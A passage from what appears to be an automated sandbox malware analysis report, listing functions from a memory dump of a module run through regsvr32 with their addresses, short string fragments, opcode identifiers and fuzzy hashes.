                                                      • Instruction Fuzzy Hash: 54A11871A0460CCFDF59DFA8C44A6DDB7F2FB48344F104529E816BB261CB749909CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180018190 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :d
                                                      • API String ID: 0-1981401805
                                                      • Opcode ID: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                      • Instruction ID: 210e0c3814bb066ec4f0600647a6f8918949d15d236ac433349e910c02a539df
                                                      • Opcode Fuzzy Hash: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                      • Instruction Fuzzy Hash: 55B1067150560DDFCB88DF28C089ADE7BE0FF58308F825229F80AA7255D774DA98DB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800207BC Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'NL
                                                      • API String ID: 0-130891299
                                                      • Opcode ID: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                      • Instruction ID: bb2c5b98f4e45d76fdff147334347c6d164a6d6c8cf2b5048c0250209dce3a22
                                                      • Opcode Fuzzy Hash: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                      • Instruction Fuzzy Hash: 08816770900748CFDB99CF68C4896DE7BF0FB48394F609129F94697261C774D989CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001705C Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ETz
                                                      • API String ID: 0-3877082699
                                                      • Opcode ID: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                      • Instruction ID: db1a2cf02a49f3c5a1febdf95057c2803ba9c7043f43a3a74a84a847f8708688
                                                      • Opcode Fuzzy Hash: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                      • Instruction Fuzzy Hash: 6281BC34A0674CCBDB65CFA8C0897CDBBF1FF68348F104119E915AA2A6CB70D559CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800261E0 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #;*z
                                                      • API String ID: 0-1682342327
                                                      • Opcode ID: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                      • Instruction ID: dbf9c55ae058a2f54c24d1eac6a5ff2fe61b468a3017e99be0a6ffbf3af3057b
                                                      • Opcode Fuzzy Hash: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                      • Instruction Fuzzy Hash: EF91E0715042888FCBB9DF24D88A7DA7BA1FB45348F50C229D88ECE261DFB0564DDB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180024570 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: dQ
                                                      • API String ID: 0-4190919517
                                                      • Opcode ID: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                      • Instruction ID: 9d729ecabb7b74207a0fd84f221a36cedb2a9a3a0e5d95724699f54aa2ea8075
                                                      • Opcode Fuzzy Hash: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                      • Instruction Fuzzy Hash: 3E71E7711187988BDBFDCF28CC857D97BA6FB44744F20811CE84E8E261DB749A89CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000D7AC Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )0
                                                      • API String ID: 0-1029681778
                                                      • Opcode ID: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                      • Instruction ID: 121df312e681884aeaf9abe1505228ce9ff72d97cb51e4d07d955d8bff2ee376
                                                      • Opcode Fuzzy Hash: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                      • Instruction Fuzzy Hash: 6851673861660CCBDB69DF78D4852E93BE0FF69344F20402DFC6687266DB34D52A8B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180012168 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Uerm
                                                      • API String ID: 0-3179360214
                                                      • Opcode ID: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                      • Instruction ID: 041d59295089493447bb19a8378e04636211af5195b78f50b28b80e802418f55
                                                      • Opcode Fuzzy Hash: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                      • Instruction Fuzzy Hash: AD6103B190061A8FCF48DFA8C48A5EEBBB1FB58344F10822DE815AB365C7749A55CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180015774 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n?,#
                                                      • API String ID: 0-1323099997
                                                      • Opcode ID: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                      • Instruction ID: 565b854ac311e8ede55e0f860d8d3b50ebc6ea35409b62ec986654d35b43713b
                                                      • Opcode Fuzzy Hash: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                      • Instruction Fuzzy Hash: 4461F97054878DCBEBBADE38C8897D937B0FB48344F908529E94E8E290DB749A458B45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800059AC Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NRx
                                                      • API String ID: 0-1393999616
                                                      • Opcode ID: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                      • Instruction ID: 7c3eed2061eb3ea8b6bf0d1c70d9a16e0a2e2a77544f255897bb26607a47427d
                                                      • Opcode Fuzzy Hash: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                      • Instruction Fuzzy Hash: 46416C706197489BD3E5DF28C08679FBAE0FB88745F90A92DF585C32A1CB74C9488B43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180024104 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: {dN
                                                      • API String ID: 0-923835543
                                                      • Opcode ID: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                      • Instruction ID: f9e1d774cd1a5aafce577d99eb21246fb33c51757267e19de4f8e3655d4c3e4d
                                                      • Opcode Fuzzy Hash: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                      • Instruction Fuzzy Hash: A24118B091470D8BCF48DFA8C58A1DEBFB1FB483A8F25521DE90AB6250C7749585CF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180029134 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hT
                                                      • API String ID: 0-434349927
                                                      • Opcode ID: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                      • Instruction ID: 79a86a43dda6c0bf54cad5f70c675ce2074b99fb8c760d3b3e2f6daa19ea02a9
                                                      • Opcode Fuzzy Hash: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                      • Instruction Fuzzy Hash: 2A5190B190038E8BCB48DF68C88A5DE7BB0FB58308F104A19FC65A6250D7B4D669CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800135A6 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w.
                                                      • API String ID: 0-4252102657
                                                      • Opcode ID: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                      • Instruction ID: ff83c9861e3aef96e788ade2e95c5d31a765335f039db5447ff320373d52f62b
                                                      • Opcode Fuzzy Hash: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                      • Instruction Fuzzy Hash: 524127B190434A8BCF48DF64C88A4DE7FB1FB58348F10861DEC5AA7250D7749659CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800079EC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \>
                                                      • API String ID: 0-4115654482
                                                      • Opcode ID: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                      • Instruction ID: c8bfe62f06df19f0db5cc8e5fd5c20be0a97c60a2c34a345c5b0509f61aa275d
                                                      • Opcode Fuzzy Hash: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                      • Instruction Fuzzy Hash: 5041B0B490038E8FDB48DF65D8895DE7BB0FB48358F104A1AEC25A6250D7B4D664CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001F6DC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UfMm
                                                      • API String ID: 0-3877223347
                                                      • Opcode ID: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                      • Instruction ID: c77ef5b6f515275834e01b5fcfcfc22ffe1a93dbca634ff8363d49e0f941db2a
                                                      • Opcode Fuzzy Hash: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                      • Instruction Fuzzy Hash: A1519EB190474E8BCF49CF64C48A5DE7FB0FB68398F214219E85A96250D3B8D6A4CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800173DC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^I%
                                                      • API String ID: 0-4091345571
                                                      • Opcode ID: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                      • Instruction ID: 24279a7f0b8a810ed47d94a020ccddcda864278dcc3d62ea9a1aafd37f1cc870
                                                      • Opcode Fuzzy Hash: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                      • Instruction Fuzzy Hash: D641C2B090074E8BCB48DF68C58A4DE7FF0FB68398F204219EC16A6250D3B496A4CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180008370 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: E
                                                      • API String ID: 0-4189953480
                                                      • Opcode ID: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                      • Instruction ID: 97bb68eb89739962e45bd832e2874dcd633b22f5609a7b84b761109d701c7c23
                                                      • Opcode Fuzzy Hash: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                      • Instruction Fuzzy Hash: B341D5B491038E8FCF88DF69D8495DE7BB0FB18358F104A19EC2AA6250D3B49664CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002582C Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JLq
                                                      • API String ID: 0-4186083495
                                                      • Opcode ID: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                      • Instruction ID: 27128c2ca0a5d288d3179379bf0eddb2aee49c7a11679c2610c242e98f2fdc84
                                                      • Opcode Fuzzy Hash: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                      • Instruction Fuzzy Hash: 3C41D5B090064E8FDF48CF68C4865EE7BF1FB58358F114229E846AA254C7789A95CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800150F0 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: vYa-
                                                      • API String ID: 0-893662192
                                                      • Opcode ID: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                      • Instruction ID: ed719b7027dd4d7706803f37edca27847d3dc95415a6febebb675a1e15796353
                                                      • Opcode Fuzzy Hash: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                      • Instruction Fuzzy Hash: 0741C0B090034E8FCF48CF64D88A5DE7FB0FB68398F104619E856A6250D7B896A5CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180015BB8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: < dA
                                                      • API String ID: 0-2747138368
                                                      • Opcode ID: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                      • Instruction ID: 677e9d37894352eedc94dfbe70e1d5a5f16f85bbcaa69aa355918790c22682b0
                                                      • Opcode Fuzzy Hash: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                      • Instruction Fuzzy Hash: 2741A0B180074E8FCB49CF64D48A4DE7FB0FB68388F204619E856A6254D7B496A8CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800135B4 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w.
                                                      • API String ID: 0-4252102657
                                                      • Opcode ID: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                      • Instruction ID: 9835b62cc5c81bb08ffa4c0ed138b56601e81b85f9b16a4ced47218125f66503
                                                      • Opcode Fuzzy Hash: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                      • Instruction Fuzzy Hash: FC41E4B090434A8BCF48DF64C88A4DE7FB1FB58348F11861DEC5AA6250D7B496A9CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001F878 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: }]T*
                                                      • API String ID: 0-3642313528
                                                      • Opcode ID: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                      • Instruction ID: a9b4d124700f7192ec0ffbe58db6f2cedd89af67995077d1789eaf9c0a4fefb8
                                                      • Opcode Fuzzy Hash: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                      • Instruction Fuzzy Hash: 624191B191074E9FCF48DF64D48A4DE7FB0FB68388F214619E816A6210D3B496A4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180013568 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w.
                                                      • API String ID: 0-4252102657
                                                      • Opcode ID: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                      • Instruction ID: 13a44cd4838b071505596f301d9460f32b91f3f909068c68e30d7ec81fe075ae
                                                      • Opcode Fuzzy Hash: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                      • Instruction Fuzzy Hash: 194104B090434A8BCF48CF64C88A4DE7FB1FB58348F10861DEC5AA6250D7B496A8CFC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000E5D4 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N8$
                                                      • API String ID: 0-2933465586
                                                      • Opcode ID: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                      • Instruction ID: 297b3d980fd839d27da657b87e2df8633a1b9c783a0b67fb1012bddc2283f9fe
                                                      • Opcode Fuzzy Hash: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                      • Instruction Fuzzy Hash: 0241827180078E8FCB45CF64D88A4CE7FB0FB18358F105A19F865A7260D3B49664CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002B564 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: wk
                                                      • API String ID: 0-1447520534
                                                      • Opcode ID: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                      • Instruction ID: ed1e7f9bc21f483ed76e74f249cc539d96e15df8e9c5d2752f3a18cd8a4680c8
                                                      • Opcode Fuzzy Hash: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                      • Instruction Fuzzy Hash: A041C4B180074E8BCB48DF68D48A4CE7FF0FB68398F10461DE859A6250D7B49AA4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180025180 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D7
                                                      • API String ID: 0-599489778
                                                      • Opcode ID: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                      • Instruction ID: 9ff7da26f915c3fd9b9081bc776a27ba1207aebd425a4d5bef8b93ab939ca450
                                                      • Opcode Fuzzy Hash: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                      • Instruction Fuzzy Hash: 4541B0B090074E8BCF48DF68D4965DE7FB0FB68388F20421DE816A6250D7B496A5CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800048B0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547686586
                                                      • Opcode ID: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                      • Instruction ID: fb4667ec304b728e9739446c3b2210f9efd75ae712771165d94948b9d3b69a1a
                                                      • Opcode Fuzzy Hash: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                      • Instruction Fuzzy Hash: E641D2B181038ECFCB48CFA4D88A5CE7BB1FB48358F115A09FC65A6224D3B49665CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180015A64 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q
                                                      • API String ID: 0-2885194100
                                                      • Opcode ID: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                      • Instruction ID: a9705b719f6d6278401c973a571993bf085652b79919a3d293b183e1acac7421
                                                      • Opcode Fuzzy Hash: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                      • Instruction Fuzzy Hash: 9141F5B180434E8FCF48CFA4C84A4DE7FB1FB18318F004619EC5AA6250D7B49664CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180016054 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UA;k
                                                      • API String ID: 0-1243451539
                                                      • Opcode ID: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                      • Instruction ID: 446a4ee04f98266578c7fdeec7750357e9914a8a062f983f2ae732e753f3f9f0
                                                      • Opcode Fuzzy Hash: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
